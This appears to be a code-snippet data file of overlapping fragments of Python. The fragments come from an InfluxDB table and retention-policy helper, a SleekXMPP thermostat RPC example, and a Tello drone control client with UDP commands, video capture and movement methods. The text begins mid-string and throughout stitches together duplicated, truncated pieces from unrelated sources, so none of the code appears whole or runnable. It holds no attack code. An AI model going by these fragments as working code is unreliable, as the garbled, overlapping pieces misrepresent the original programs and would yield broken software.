\"\"\"table is declared within", "-> bool: if(isinstance(o, RetentionPolicy)): return o.to_dict() == self.to_dict() return False", "columns for table {self.name} are declared: {key}\") # before key+\"MISSING\"", "Do not overwrite it. elif(key is time_stamp_field): time_overwrite_allowed: bool =", "Database = database self.__fields: Dict[str, Datatype] = fields self.__tags: List[str]", "tables(self) -> Dict[str, Table]: \"\"\"Dict with table definitions to look", "__repr__(self) -> str: return f\"Table: {self.name}\" def split_by_table_def(self, mydict: Dict[str,", "name to create table\") if(not time_key): raise ValueError(\"time key cannot", "@unique class Datatype(Enum): \"\"\" This enum differentiates between the different", "retention policy associated with this table database - table is", "definiton declared within this table. Arguments: self {Table} -- Table", "time is 0s, then the db decides what to take\"\"\"", "was not defined. []-Access. Arguments: table_name {str} -- name of", "raise ValueError(\"need at least one value in dict to split\")", "def __getitem__(self, table_name: str) -> Table: \"\"\"Aquire a instance of", "This function uses the tag/field and timestamp definiton declared within", "STRING = str \"\"\"Special symbols and \\\" will be escaped.\"\"\"", "= type(int) \"\"\"Automatic transform a timestamp into seconds. Important: Only", "of the database tables - tables with predefined tags &", "colums as keys. None-Values are ignored Raises: ValueError: If no", "empty table if it was not defined. []-Access. Arguments: table_name", "of the types within the enum is important: bool is", "split_by_table_def - Split the given dict into a pre-defined set", "warning. This function uses the tag/field and timestamp definiton declared", "def __str__(self) -> str: return self.name def __repr__(self) -> str:", "dict.fromkeys(self.tags, None) # what field should be recorded as time", "sppmonCTS has lowest priority, only set if otherwise None if(time_stamp", "in tags): tags[key] = value elif(key in InfluxUtils.time_key_names or key", "\"\"\" @property def name(self) -> str: \"\"\"name of the Retention", "def name(self) -> str: \"\"\"name of the Retention Policy\"\"\" return", "the right format. The order of the types within the", "returns `NONE`. Arguments: value {Union[str, float, int, bool, None]} --", "next(filter(lambda rp: rp.default, database.retention_policies)) self.__database: Database = database self.__fields: Dict[str,", "in time_stamp_field or key in InfluxUtils.time_key_names): # sppmonCTS has lowest", "the data is mixed with any other type.\"\"\" FLOAT =", "as keys. None-Values are ignored Raises: ValueError: If no dict", "a dict, we only need the keys fields: Dict[str, Any]", "__repr__(self) -> str: return f'Database: {self.name}' def __init__(self, name: str):", "'time', retention_policy: RetentionPolicy = None) -> None: if(not database): raise", "datatype\"\"\" return self.__fields @property def tags(self) -> List[str]: \"\"\"tags of", "continue and drop field else: continue # Otherwise check for", "for the influx database. Classes: Datatype Database Table RetentionPolicy \"\"\"", "error: ExceptionUtils.exception_info(error) raise ValueError(f\"shard duration for retention policy {name} is", "Arguments: value {Union[str, float, int, bool, None]} -- Value to", "for creation\") if(not replication): raise ValueError(\"need retention policy replication factor", "overwrite allowed, continue and drop field else: continue # Otherwise", "Table] = {} self.__retention_policies: Set[RetentionPolicy] = set() self.__continuous_queries: Set[Queries.ContinuousQuery] =", "self.__default = default try: # str due usage of method", "Any], int) -- Tuple of: tags, fields, timestamp \"\"\" if(not", "policy {name} is not in the correct time format\") def", "due usage of method self.__duration: str = InfluxUtils.transform_time_literal(duration, single_vals=False) except", "dataset is deleted from the DB. Attributes name - name", "BOOL = bool \"\"\"Any boolean, be aware it is a" ]
[ "file LICENSE for copying permission. \"\"\" from sleekxmpp.plugins.xep_0009.remote import Endpoint,", "(C) 2011 <NAME> This file is part of SleekXMPP. See", "permission. \"\"\" from sleekxmpp.plugins.xep_0009.remote import Endpoint, remote, Remote, \\ ANY_ALL", "%s\" % temperature) self._temperature = temperature @remote def get_temperature(self): return", "get_temperature(self): return self._temperature @remote(False) def release(self): self._event.set() def wait_for_release(self): self._event.wait()", "set_temperature(self, temperature): print(\"Setting temperature to %s\" % temperature) self._temperature =", "def wait_for_release(self): self._event.wait() def main(): session = Remote.new_session('sleek@xmpp.org/rpc', '*****') thermostat", "temperature) self._temperature = temperature @remote def get_temperature(self): return self._temperature @remote(False)", "self._temperature = temperature @remote def get_temperature(self): return self._temperature @remote(False) def", "for copying permission. \"\"\" from sleekxmpp.plugins.xep_0009.remote import Endpoint, remote, Remote,", "The Sleek XMPP Library Copyright (C) 2011 <NAME> This file", "initial_temperature self._event = threading.Event() @remote def set_temperature(self, temperature): print(\"Setting temperature", "session = Remote.new_session('sleek@xmpp.org/rpc', '*****') thermostat = session.new_handler(ANY_ALL, Thermostat, 18) thermostat.wait_for_release()", "part of SleekXMPP. See the file LICENSE for copying permission.", "'thermostat' def __init(self, initial_temperature): self._temperature = initial_temperature self._event = threading.Event()", "class Thermostat(Endpoint): def FQN(self): return 'thermostat' def __init(self, initial_temperature): self._temperature", "<NAME> This file is part of SleekXMPP. See the file", "<gh_stars>1-10 \"\"\" SleekXMPP: The Sleek XMPP Library Copyright (C) 2011", "self._event = threading.Event() @remote def set_temperature(self, temperature): print(\"Setting temperature to", "= session.new_handler(ANY_ALL, Thermostat, 18) thermostat.wait_for_release() session.close() if __name__ == '__main__':", "Sleek XMPP Library Copyright (C) 2011 <NAME> This file is", "self._event.wait() def main(): session = Remote.new_session('sleek@xmpp.org/rpc', '*****') thermostat = session.new_handler(ANY_ALL,", "= Remote.new_session('sleek@xmpp.org/rpc', '*****') thermostat = session.new_handler(ANY_ALL, Thermostat, 18) thermostat.wait_for_release() session.close()", "This file is part of SleekXMPP. See the file LICENSE", "self._temperature @remote(False) def release(self): self._event.set() def wait_for_release(self): self._event.wait() def main():", "self._event.set() def wait_for_release(self): self._event.wait() def main(): session = Remote.new_session('sleek@xmpp.org/rpc', '*****')", "print(\"Setting temperature to %s\" % temperature) self._temperature = temperature @remote", "__init(self, initial_temperature): self._temperature = initial_temperature self._event = threading.Event() @remote def", "file is part of SleekXMPP. See the file LICENSE for", "temperature @remote def get_temperature(self): return self._temperature @remote(False) def release(self): self._event.set()", "to %s\" % temperature) self._temperature = temperature @remote def get_temperature(self):", "temperature to %s\" % temperature) self._temperature = temperature @remote def", "= threading.Event() @remote def set_temperature(self, temperature): print(\"Setting temperature to %s\"", "self._temperature = initial_temperature self._event = threading.Event() @remote def set_temperature(self, temperature):", "main(): session = Remote.new_session('sleek@xmpp.org/rpc', '*****') thermostat = session.new_handler(ANY_ALL, Thermostat, 18)", "def release(self): self._event.set() def wait_for_release(self): self._event.wait() def main(): session =", "def FQN(self): return 'thermostat' def __init(self, initial_temperature): self._temperature = initial_temperature", "session.new_handler(ANY_ALL, Thermostat, 18) thermostat.wait_for_release() session.close() if __name__ == '__main__': main()", "ANY_ALL import threading class Thermostat(Endpoint): def FQN(self): return 'thermostat' def", "threading.Event() @remote def set_temperature(self, temperature): print(\"Setting temperature to %s\" %", "from sleekxmpp.plugins.xep_0009.remote import Endpoint, remote, Remote, \\ ANY_ALL import threading", "FQN(self): return 'thermostat' def __init(self, initial_temperature): self._temperature = initial_temperature self._event", "sleekxmpp.plugins.xep_0009.remote import Endpoint, remote, Remote, \\ ANY_ALL import threading class", "release(self): self._event.set() def wait_for_release(self): self._event.wait() def main(): session = Remote.new_session('sleek@xmpp.org/rpc',", "return self._temperature @remote(False) def release(self): self._event.set() def wait_for_release(self): self._event.wait() def", "threading class Thermostat(Endpoint): def FQN(self): return 'thermostat' def __init(self, initial_temperature):", "def __init(self, initial_temperature): self._temperature = initial_temperature self._event = threading.Event() @remote", "import Endpoint, remote, Remote, \\ ANY_ALL import threading class Thermostat(Endpoint):", "Library Copyright (C) 2011 <NAME> This file is part of", "@remote def get_temperature(self): return self._temperature @remote(False) def release(self): self._event.set() def", "\"\"\" from sleekxmpp.plugins.xep_0009.remote import Endpoint, remote, Remote, \\ ANY_ALL import", "def set_temperature(self, temperature): print(\"Setting temperature to %s\" % temperature) self._temperature", "= initial_temperature self._event = threading.Event() @remote def set_temperature(self, temperature): print(\"Setting", "temperature): print(\"Setting temperature to %s\" % temperature) self._temperature = temperature", "Remote, \\ ANY_ALL import threading class Thermostat(Endpoint): def FQN(self): return", "return 'thermostat' def __init(self, initial_temperature): self._temperature = initial_temperature self._event =", "remote, Remote, \\ ANY_ALL import threading class Thermostat(Endpoint): def FQN(self):", "Copyright (C) 2011 <NAME> This file is part of SleekXMPP.", "the file LICENSE for copying permission. \"\"\" from sleekxmpp.plugins.xep_0009.remote import", "copying permission. \"\"\" from sleekxmpp.plugins.xep_0009.remote import Endpoint, remote, Remote, \\", "@remote def set_temperature(self, temperature): print(\"Setting temperature to %s\" % temperature)", "SleekXMPP. See the file LICENSE for copying permission. \"\"\" from", "wait_for_release(self): self._event.wait() def main(): session = Remote.new_session('sleek@xmpp.org/rpc', '*****') thermostat =", "LICENSE for copying permission. \"\"\" from sleekxmpp.plugins.xep_0009.remote import Endpoint, remote,", "Remote.new_session('sleek@xmpp.org/rpc', '*****') thermostat = session.new_handler(ANY_ALL, Thermostat, 18) thermostat.wait_for_release() session.close() if", "initial_temperature): self._temperature = initial_temperature self._event = threading.Event() @remote def set_temperature(self,", "Endpoint, remote, Remote, \\ ANY_ALL import threading class Thermostat(Endpoint): def", "def get_temperature(self): return self._temperature @remote(False) def release(self): self._event.set() def wait_for_release(self):", "is part of SleekXMPP. See the file LICENSE for copying", "2011 <NAME> This file is part of SleekXMPP. See the", "def main(): session = Remote.new_session('sleek@xmpp.org/rpc', '*****') thermostat = session.new_handler(ANY_ALL, Thermostat,", "See the file LICENSE for copying permission. \"\"\" from sleekxmpp.plugins.xep_0009.remote", "SleekXMPP: The Sleek XMPP Library Copyright (C) 2011 <NAME> This", "of SleekXMPP. See the file LICENSE for copying permission. \"\"\"", "\\ ANY_ALL import threading class Thermostat(Endpoint): def FQN(self): return 'thermostat'", "'*****') thermostat = session.new_handler(ANY_ALL, Thermostat, 18) thermostat.wait_for_release() session.close() if __name__", "thermostat = session.new_handler(ANY_ALL, Thermostat, 18) thermostat.wait_for_release() session.close() if __name__ ==", "XMPP Library Copyright (C) 2011 <NAME> This file is part", "@remote(False) def release(self): self._event.set() def wait_for_release(self): self._event.wait() def main(): session", "\"\"\" SleekXMPP: The Sleek XMPP Library Copyright (C) 2011 <NAME>", "= temperature @remote def get_temperature(self): return self._temperature @remote(False) def release(self):", "% temperature) self._temperature = temperature @remote def get_temperature(self): return self._temperature", "Thermostat(Endpoint): def FQN(self): return 'thermostat' def __init(self, initial_temperature): self._temperature =", "import threading class Thermostat(Endpoint): def FQN(self): return 'thermostat' def __init(self," ]
[ "If no response is received within self.timeout seconds. \"\"\" self.response_client.pop()", "rotate_velocity: int, [-100, 100] param with_return: bool return: 'ok' or", "threading class Response(object): def __init__(self): pass def recv(self, data): pass", "self.lock: return self.response is None class State(Response): def __init__(self): super(State,", "last returned. \"\"\" while True: try: self.response.recv(self.socket.recv(self.buffer_size)) except Exception as", "self.thread.start() def __del__(self): self.video.release() def _update_thread(self): while True: ok, frame", "rejected the attempt to enter command mode') def take_off(self): \"\"\"", "or 'error' \"\"\" return self.send_command('up {}'.format(x), with_return) def move_down(self, x,", "return: 'ok' or 'error' \"\"\" return self.send_command('takeoff') def land(self): \"\"\"", "param speed: int, [10-100] param with_return: bool return: 'ok' or", "int, [20, 500] param with_return: bool return: 'ok' or 'error'", "\"\"\" return self.get('acceleration?', split=True) def get_tof_height(self): \"\"\" return: int, [10,", "self.receive_thread.daemon = daemon self.receive_thread.start() def __del__(self): \"\"\"Closes the local socket.\"\"\"", "'ok' or 'error' \"\"\" return self.send_command('up {}'.format(x), with_return) def move_down(self,", "receive video from Tello? Raises: RuntimeError: If the Tello rejects", "0), (x1, y1, z1), (x2, y2, z2) with speed param", "'ok' or 'error' \"\"\" return self.send_command('down {}'.format(x), with_return) def move_left(self,", "if video: self.open_video_stream() self.video_client = Video(True) def send_command(self, command, with_return=True):", "get_imu_pose(self): \"\"\"[pitch, roll, yaw] return: list(int), [[-89, 89], [-179, 179],", "b', with_return) def goto(self, x, y, z, speed, with_return=False): \"\"\"", "{} {}'.format(x1, y1, z1, x2, y2, z2, speed), with_return) def", "with self.lock: response, self.response = self.response, None return response def", "buffer_size self.socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) self.socket.bind(('', local_port)) self.receive_thread = threading.Thread(target=self._receive_thread)", "the Tello. Runs as a thread, sets self.response to whatever", "command response. command_timeout (float): seconds to wait for a response", "return: 'ok' or 'error' \"\"\" return self.send_command('land') def open_video_stream(self): if", "pop(self): pass def empty(self): pass class Command(Response): def __init__(self): super(Command,", "= self.response, None return response def empty(self): with self.lock: return", "or 'error' \"\"\" return self.send_command('land') def open_video_stream(self): if self.send_command('streamon') !=", "with self.lock: return self.response is None class State(Response): def __init__(self):", "return self.response is None class State(Response): def __init__(self): super(State, self).__init__()", "recv(self, data): with self.lock: self.response = {item.split(':')[0]:float(item.split(':')[1]) for item in", "return: 'ok' or 'error' \"\"\" return self.send_command('streamoff') def emergency_shutdown(self): \"\"\"", "set_remote_controller_command(self, left_right_velocity, forward_backward_velocity, up_down_velocity, rotate_velocity, with_return=False): \"\"\" param left_right_velocity: int,", "param with_return: bool return: 'ok' or 'error' \"\"\" return self.send_command('go", "\"\"\" result = self.send_command(command) if split: return [int(x) for x", "param with_return: bool return: 'ok' or 'error' \"\"\" return self.send_command('back", "port of local machine for receiving command response. command_timeout (float):", "with self.lock: self.response = data.decode('utf-8') def pop(self): with self.lock: response,", "with_return: bool return: 'ok' or 'error' \"\"\" return self.send_command('up {}'.format(x),", "self.send_command('streamon') != 'ok': raise RuntimeError('Tello rejected to open the video", "self.send_command('emergency') def move_up(self, x, with_return=False): \"\"\" param x: int, [20,", "for receiving command response. command_timeout (float): seconds to wait for", "return self.send_command('back {}'.format(x), with_return) def rotate_clockwise(self, x, with_return=False): \"\"\" param", "y2, z2, speed, with_return=False): \"\"\"fly a curve defined by (0,", "z, speed), with_return) def goto_curve(self, x1, y1, z1, x2, y2,", "z2) with speed param x1, x2: int, [-500, 500] param", "command') return self.response_client.pop() def state(self): return self.state_client.pop() if self.state_client else", "response to command') return self.response_client.pop() def state(self): return self.state_client.pop() if", "'error' \"\"\" return self.send_command('streamoff') def emergency_shutdown(self): \"\"\" return: 'ok' or", "y1, z1, x2, y2, z2, speed, with_return=False): \"\"\"fly a curve", "if self.send_command('streamon') != 'ok': raise RuntimeError('Tello rejected to open the", "[-500, 500] param y1, y2: int, [-500, 500] param z1,", "int \"\"\" return self.get('time?') def get_relative_height(self): \"\"\" return: int, [10,", "by (0, 0, 0), (x1, y1, z1), (x2, y2, z2)", "return: int, [0, 90] \"\"\" return self.get('temp?') def get_imu_pose(self): \"\"\"[pitch,", "up_down_velocity: int, [-100, 100] param rotate_velocity: int, [-100, 100] param", "\"\"\" return self.get('height?') def get_temperature(self): \"\"\" return: int, [0, 90]", "int, [20, 500] param z: int, [20, 500] param speed:", "!= 'ok': raise RuntimeError('Tello rejected to open the video stream')", "{}'.format(x), with_return) def move_backward(self, x, with_return=False): \"\"\" param x: int,", "return self.send_command('go {} {} {} {}'.format(x, y, z, speed), with_return)", "'error' \"\"\" return self.send_command('emergency') def move_up(self, x, with_return=False): \"\"\" param", "\"\"\" return self.send_command('flip r', with_return) def flip_forward(self, with_return=False): \"\"\" param", "{}'.format(speed), with_return) def set_remote_controller_command(self, left_right_velocity, forward_backward_velocity, up_down_velocity, rotate_velocity, with_return=False): \"\"\"", "\"\"\" return self.send_command('go {} {} {} {}'.format(x, y, z, speed),", "self.response = None self.lock = threading.RLock() def recv(self, data): with", "with_return) def move_right(self, x, with_return=False): \"\"\" param x: int, [20,", "response. If self.command_timeout is exceeded before a response is received,", "or 'error' \"\"\" return self.send_command('right {}'.format(x), with_return) def move_forward(self, x,", "socket.socket(socket.AF_INET, socket.SOCK_DGRAM) self.socket.bind(('', local_port)) self.receive_thread = threading.Thread(target=self._receive_thread) self.receive_thread.daemon = daemon", "{}'.format(x), with_return) def move_right(self, x, with_return=False): \"\"\" param x: int,", "def flip_forward(self, with_return=False): \"\"\" param with_return: bool return: 'ok' or", "Args: command (str): Command to send. Returns: str: Response from", "video=True): \"\"\"Connects to Tello in command mode. Args: local_port (int):", "\"\"\" return self.send_command('up {}'.format(x), with_return) def move_down(self, x, with_return=False): \"\"\"", "None return response def empty(self): with self.lock: return self.response is", "self.video.isOpened(): raise RuntimeError('Failed to connect to Tello') self.frame = None", "with_return) def rotate_clockwise(self, x, with_return=False): \"\"\" param x: int, [1,", "with_return: bool return: 'ok' or 'error' \"\"\" return self.send_command('ccw {}'.format(x),", "bool return: 'ok' or 'error' \"\"\" return self.send_command('flip b', with_return)", "100] param forward_backward_velocity: int, [-100, 100] param up_down_velocity: int, [-100,", "bool return: 'ok' or 'error' \"\"\" return self.send_command('flip r', with_return)", "self.video.release() def _update_thread(self): while True: ok, frame = self.video.read() if", "bool return: 'ok' or 'error' \"\"\" return self.send_command('curve {} {}", "get_flight_time(self): \"\"\" return: int \"\"\" return self.get('time?') def get_relative_height(self): \"\"\"", "Args: local_port (int): port of local machine for receiving command", "\"\"\" return self.get('temp?') def get_imu_pose(self): \"\"\"[pitch, roll, yaw] return: list(int),", "with_return) def goto_curve(self, x1, y1, z1, x2, y2, z2, speed,", "return self.send_command('rc {} {} {} {}'.format(left_right_velocity, forward_backward_velocity, up_down_velocity, rotate_velocity), with_return)", "y2, z2, speed), with_return) def set_speed(self, speed, with_return=False): \"\"\" param", "def close_video_stream(self): \"\"\" return: 'ok' or 'error' \"\"\" return self.send_command('streamoff')", "\"\"\"[pitch, roll, yaw] return: list(int), [[-89, 89], [-179, 179], [-179,", "self.get('height?') def get_temperature(self): \"\"\" return: int, [0, 90] \"\"\" return", "{}'.format(x), with_return) def rotate_clockwise(self, x, with_return=False): \"\"\" param x: int,", "\"\"\" return self.send_command('forward {}'.format(x), with_return) def move_backward(self, x, with_return=False): \"\"\"", "= daemon self.thread.start() def __del__(self): self.video.release() def _update_thread(self): while True:", "Response from Tello. Raises: RuntimeError: If no response is received", "in command mode. Args: local_port (int): port of local machine", "return self.send_command('streamoff') def emergency_shutdown(self): \"\"\" return: 'ok' or 'error' \"\"\"", "local machine for receiving command response. command_timeout (float): seconds to", "pass class Command(Response): def __init__(self): super(Command, self).__init__() self.response = None", "int, [20, 500] param y: int, [20, 500] param z:", "def get_imu_acceleration(self): \"\"\" return: list(int) \"\"\" return self.get('acceleration?', split=True) def", "'ok' or 'error' \"\"\" return self.send_command('streamoff') def emergency_shutdown(self): \"\"\" return:", "flip_forward(self, with_return=False): \"\"\" param with_return: bool return: 'ok' or 'error'", "\"\"\" param x: int, [20, 500] param y: int, [20,", "move_down(self, x, with_return=False): \"\"\" param x: int, [20, 500] param", "self.buffer_size = buffer_size self.socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) self.socket.bind(('', local_port)) self.receive_thread", "self.command_timeout = command_timeout self.response_client = Client(local_port, 1024, True, Command()) self.state_client", "get_battery(self): \"\"\" return: int, [0, 100] \"\"\" return self.get('battery?') def", "{}'.format(x), with_return) def rotate_counter_clockwise(self, x, with_return=False): \"\"\" param x: int,", "video (bool): receive video from Tello? Raises: RuntimeError: If the", "\"\"\" return self.send_command('cw {}'.format(x), with_return) def rotate_counter_clockwise(self, x, with_return=False): \"\"\"", "cv2 import time import socket import threading class Response(object): def", "[20, 500] param speed: int, [10-100] param with_return: bool return:", "return self.send_command('forward {}'.format(x), with_return) def move_backward(self, x, with_return=False): \"\"\" param", "= ('192.168.10.1', 8889) self.enter_command_mode() self.video_client = None if video: self.open_video_stream()", "for a response. If self.command_timeout is exceeded before a response", "not available') while self.video_client.empty(): pass return self.video_client.pop() def enter_command_mode(self): if", "[0, 100] \"\"\" return self.get('battery?') def get_flight_time(self): \"\"\" return: int", "r', with_return) def flip_forward(self, with_return=False): \"\"\" param with_return: bool return:", "is received, a RuntimeError exception is raised. Args: command (str):", "\"\"\" return: list(int) \"\"\" return self.get('acceleration?', split=True) def get_tof_height(self): \"\"\"", "data): with self.lock: self.response = data.decode('utf-8') def pop(self): with self.lock:", "return: 'ok' or 'error' \"\"\" return self.send_command('flip l', with_return) def", "param with_return: bool return: 'ok' or 'error' \"\"\" return self.send_command('ccw", "to open the video stream') def close_video_stream(self): \"\"\" return: 'ok'", "self.response.recv(self.socket.recv(self.buffer_size)) except Exception as e: print(e) break def empty(self): return", "split=True) def get_tof_height(self): \"\"\" return: int, [10, 400]; 6553: out", "('192.168.10.1', 8889) self.enter_command_mode() self.video_client = None if video: self.open_video_stream() self.video_client", "500] param speed: int, [10-100] param with_return: bool return: 'ok'", "(bool): receive video from Tello? Raises: RuntimeError: If the Tello", "self.video = cv2.VideoCapture('udp://@0.0.0.0:11111') if not self.video.isOpened(): raise RuntimeError('Failed to connect", "return self.response def empty(self): return False class Client(object): def __init__(self,", "self.frame = frame def empty(self): with self.lock: return self.frame is", "return self.send_command('flip b', with_return) def goto(self, x, y, z, speed,", "command param split: bool, multiple values? return: int or list(int)", "pass def pop(self): pass def empty(self): pass class Command(Response): def", "= threading.RLock() def recv(self, data): with self.lock: self.response = data.decode('utf-8')", "param with_return: bool return: 'ok' or 'error' \"\"\" return self.send_command('speed", "or 'error' \"\"\" return self.send_command('flip b', with_return) def goto(self, x,", "a response is received, a RuntimeError exception is raised. Args:", "return self.send_command('down {}'.format(x), with_return) def move_left(self, x, with_return=False): \"\"\" param", ">= self.command_timeout: raise RuntimeError('No response to command') return self.response_client.pop() def", "self.receive_thread = threading.Thread(target=self._receive_thread) self.receive_thread.daemon = daemon self.receive_thread.start() def __del__(self): \"\"\"Closes", "recv(self, data): with self.lock: self.response = data.decode('utf-8') def pop(self): with", "video stream') def close_video_stream(self): \"\"\" return: 'ok' or 'error' \"\"\"", "\"\"\" return self.send_command('emergency') def move_up(self, x, with_return=False): \"\"\" param x:", "with_return) def flip_backward(self, with_return=False): \"\"\" param with_return: bool return: 'ok'", "def get_battery(self): \"\"\" return: int, [0, 100] \"\"\" return self.get('battery?')", "flip_backward(self, with_return=False): \"\"\" param with_return: bool return: 'ok' or 'error'", "with self.lock: self.response = {item.split(':')[0]:float(item.split(':')[1]) for item in data.decode('utf-8').split(';') if", "def enter_command_mode(self): if self.send_command('command') != 'ok': raise RuntimeError('Tello rejected the", "get_imu_acceleration(self): \"\"\" return: list(int) \"\"\" return self.get('acceleration?', split=True) def get_tof_height(self):", "int, [10-60] param with_return: bool return: 'ok' or 'error' \"\"\"", "def empty(self): pass class Command(Response): def __init__(self): super(Command, self).__init__() self.response", "True, State()) if state else None self.tello_address = ('192.168.10.1', 8889)", "self.command_timeout: raise RuntimeError('No response to command') return self.response_client.pop() def state(self):", "self.response, None return response def empty(self): with self.lock: return self.response", "int, [1, 3600] param with_return: bool return: 'ok' or 'error'", "move_right(self, x, with_return=False): \"\"\" param x: int, [20, 500] param", "str: Response from Tello. Raises: RuntimeError: If no response is", "goto_curve(self, x1, y1, z1, x2, y2, z2, speed, with_return=False): \"\"\"fly", "x1, x2: int, [-500, 500] param y1, y2: int, [-500,", "receiving command response. command_timeout (float): seconds to wait for a", "self.state_client = Client(8890, 1024, True, State()) if state else None", "[10-60] param with_return: bool return: 'ok' or 'error' \"\"\" return", "self.send_command('down {}'.format(x), with_return) def move_left(self, x, with_return=False): \"\"\" param x:", "[20, 500] param y: int, [20, 500] param z: int,", "empty(self): return False class Client(object): def __init__(self, local_port, buffer_size, daemon,", "= None if video: self.open_video_stream() self.video_client = Video(True) def send_command(self,", "z1), (x2, y2, z2) with speed param x1, x2: int,", "with_return) def move_down(self, x, with_return=False): \"\"\" param x: int, [20,", "x in result.split(' ')] else: return int(result) def get_speed(self): \"\"\"", "90] \"\"\" return self.get('temp?') def get_imu_pose(self): \"\"\"[pitch, roll, yaw] return:", "return: 'ok' or 'error' \"\"\" return self.send_command('right {}'.format(x), with_return) def", "threading.Thread(target=self._update_thread) self.thread.daemon = daemon self.thread.start() def __del__(self): self.video.release() def _update_thread(self):", "'error' \"\"\" return self.send_command('speed {}'.format(speed), with_return) def set_remote_controller_command(self, left_right_velocity, forward_backward_velocity,", "param left_right_velocity: int, [-100, 100] param forward_backward_velocity: int, [-100, 100]", "z1, z2: int, [-500, 500] param speed: int, [10-60] param", "def pop(self): with self.lock: response, self.response = self.response, None return", "def flip_backward(self, with_return=False): \"\"\" param with_return: bool return: 'ok' or", "= frame def empty(self): with self.lock: return self.frame is None", "int(result) def get_speed(self): \"\"\" return: int, [10, 100] \"\"\" return", "self.response = {} self.lock = threading.RLock() def recv(self, data): with", "self.socket.close() def _receive_thread(self): \"\"\"Listens for responses from the Tello. Runs", "while True: ok, frame = self.video.read() if ok: with self.lock:", "def get_tof_height(self): \"\"\" return: int, [10, 400]; 6553: out of", "self.lock: return self.frame is None def pop(self): with self.lock: frame,", "multiple values? return: int or list(int) \"\"\" result = self.send_command(command)", "Command()) self.state_client = Client(8890, 1024, True, State()) if state else", "param y1, y2: int, [-500, 500] param z1, z2: int,", "return self.get('temp?') def get_imu_pose(self): \"\"\"[pitch, roll, yaw] return: list(int), [[-89,", "buffer_size, daemon, response): self.response = response self.buffer_size = buffer_size self.socket", "\"\"\" return: 'ok' or 'error' \"\"\" return self.send_command('emergency') def move_up(self,", "return False class Client(object): def __init__(self, local_port, buffer_size, daemon, response):", "return self.send_command('flip l', with_return) def flip_right(self, with_return=False): \"\"\" param with_return:", "return self.send_command('flip r', with_return) def flip_forward(self, with_return=False): \"\"\" param with_return:", "def get_imu_pose(self): \"\"\"[pitch, roll, yaw] return: list(int), [[-89, 89], [-179,", "command, with_return=True): \"\"\"Sends a command to the Tello and waits", "self.timeout seconds. \"\"\" self.response_client.pop() self.response_client.socket.sendto(command.encode('utf-8'), self.tello_address) if not with_return: return", "def __init__(self, local_port, buffer_size, daemon, response): self.response = response self.buffer_size", "a response. If self.command_timeout is exceeded before a response is", "self.get('temp?') def get_imu_pose(self): \"\"\"[pitch, roll, yaw] return: list(int), [[-89, 89],", "\"\"\" return self.send_command('streamoff') def emergency_shutdown(self): \"\"\" return: 'ok' or 'error'", "with_return: bool return: 'ok' or 'error' \"\"\" return self.send_command('flip l',", "self.send_command('left {}'.format(x), with_return) def move_right(self, x, with_return=False): \"\"\" param x:", "def __init__(self): pass def recv(self, data): pass def pop(self): pass", "is None class State(Response): def __init__(self): super(State, self).__init__() self.response =", "bool return: 'ok' or 'error' \"\"\" return self.send_command('ccw {}'.format(x), with_return)", "def get_temperature(self): \"\"\" return: int, [0, 90] \"\"\" return self.get('temp?')", "__del__(self): self.video.release() def _update_thread(self): while True: ok, frame = self.video.read()", "self.lock: self.response = {item.split(':')[0]:float(item.split(':')[1]) for item in data.decode('utf-8').split(';') if ':'", "recv(self, data): pass def pop(self): pass def empty(self): pass class", "def flip_right(self, with_return=False): \"\"\" param with_return: bool return: 'ok' or", "else None def read_frame(self): if self.video_client is None: raise RuntimeError('Video", "land(self): \"\"\" return: 'ok' or 'error' \"\"\" return self.send_command('land') def", "self.response_client.socket.sendto(command.encode('utf-8'), self.tello_address) if not with_return: return st = time.time() while", "[-100, 100] param with_return: bool return: 'ok' or 'error' \"\"\"", "send_command(self, command, with_return=True): \"\"\"Sends a command to the Tello and", "param y: int, [20, 500] param z: int, [20, 500]", "Video(True) def send_command(self, command, with_return=True): \"\"\"Sends a command to the", "to command') return self.response_client.pop() def state(self): return self.state_client.pop() if self.state_client", "return self.response.pop() class Video(object): def __init__(self, daemon=True): self.video = cv2.VideoCapture('udp://@0.0.0.0:11111')", "for item in data.decode('utf-8').split(';') if ':' in item} def pop(self):", "st >= self.command_timeout: raise RuntimeError('No response to command') return self.response_client.pop()", "= {item.split(':')[0]:float(item.split(':')[1]) for item in data.decode('utf-8').split(';') if ':' in item}", "self.send_command('back {}'.format(x), with_return) def rotate_clockwise(self, x, with_return=False): \"\"\" param x:", "return: int or list(int) \"\"\" result = self.send_command(command) if split:", "command (str): Command to send. Returns: str: Response from Tello.", "'ok' or 'error' \"\"\" return self.send_command('rc {} {} {} {}'.format(left_right_velocity,", "in item} def pop(self): return self.response def empty(self): return False", "self.tello_address) if not with_return: return st = time.time() while self.response_client.empty():", "speed param x1, x2: int, [-500, 500] param y1, y2:", "'ok' or 'error' \"\"\" return self.send_command('flip r', with_return) def flip_forward(self,", "Raises: RuntimeError: If the Tello rejects the attempt to enter", "close_video_stream(self): \"\"\" return: 'ok' or 'error' \"\"\" return self.send_command('streamoff') def", "frame, self.frame = self.frame, None return frame class Tello(object): def", "with_return=False): \"\"\" param x: int, [20, 500] param with_return: bool", "= self.frame, None return frame class Tello(object): def __init__(self, local_port=9999,", "self.send_command('flip l', with_return) def flip_right(self, with_return=False): \"\"\" param with_return: bool", "def read_frame(self): if self.video_client is None: raise RuntimeError('Video is not", "y1, y2: int, [-500, 500] param z1, z2: int, [-500,", "flip_right(self, with_return=False): \"\"\" param with_return: bool return: 'ok' or 'error'", "of command. state (bool): receive state from Tello? video (bool):", "with_return: bool return: 'ok' or 'error' \"\"\" return self.send_command('go {}", "param x: int, [1, 3600] param with_return: bool return: 'ok'", "with_return) def set_remote_controller_command(self, left_right_velocity, forward_backward_velocity, up_down_velocity, rotate_velocity, with_return=False): \"\"\" param", "of local machine for receiving command response. command_timeout (float): seconds", "self.lock = threading.RLock() self.thread = threading.Thread(target=self._update_thread) self.thread.daemon = daemon self.thread.start()", "time.time() - st >= self.command_timeout: raise RuntimeError('No response to command')", "self.send_command('streamoff') def emergency_shutdown(self): \"\"\" return: 'ok' or 'error' \"\"\" return", "or 'error' \"\"\" return self.send_command('takeoff') def land(self): \"\"\" return: 'ok'", "def get(self, command, split=False): \"\"\" param command param split: bool,", "video from Tello? Raises: RuntimeError: If the Tello rejects the", "\"\"\" param speed: int, [10-100] param with_return: bool return: 'ok'", "from Tello? video (bool): receive video from Tello? Raises: RuntimeError:", "break def empty(self): return self.response.empty() def pop(self): return self.response.pop() class", "not with_return: return st = time.time() while self.response_client.empty(): if time.time()", "self.tello_address = 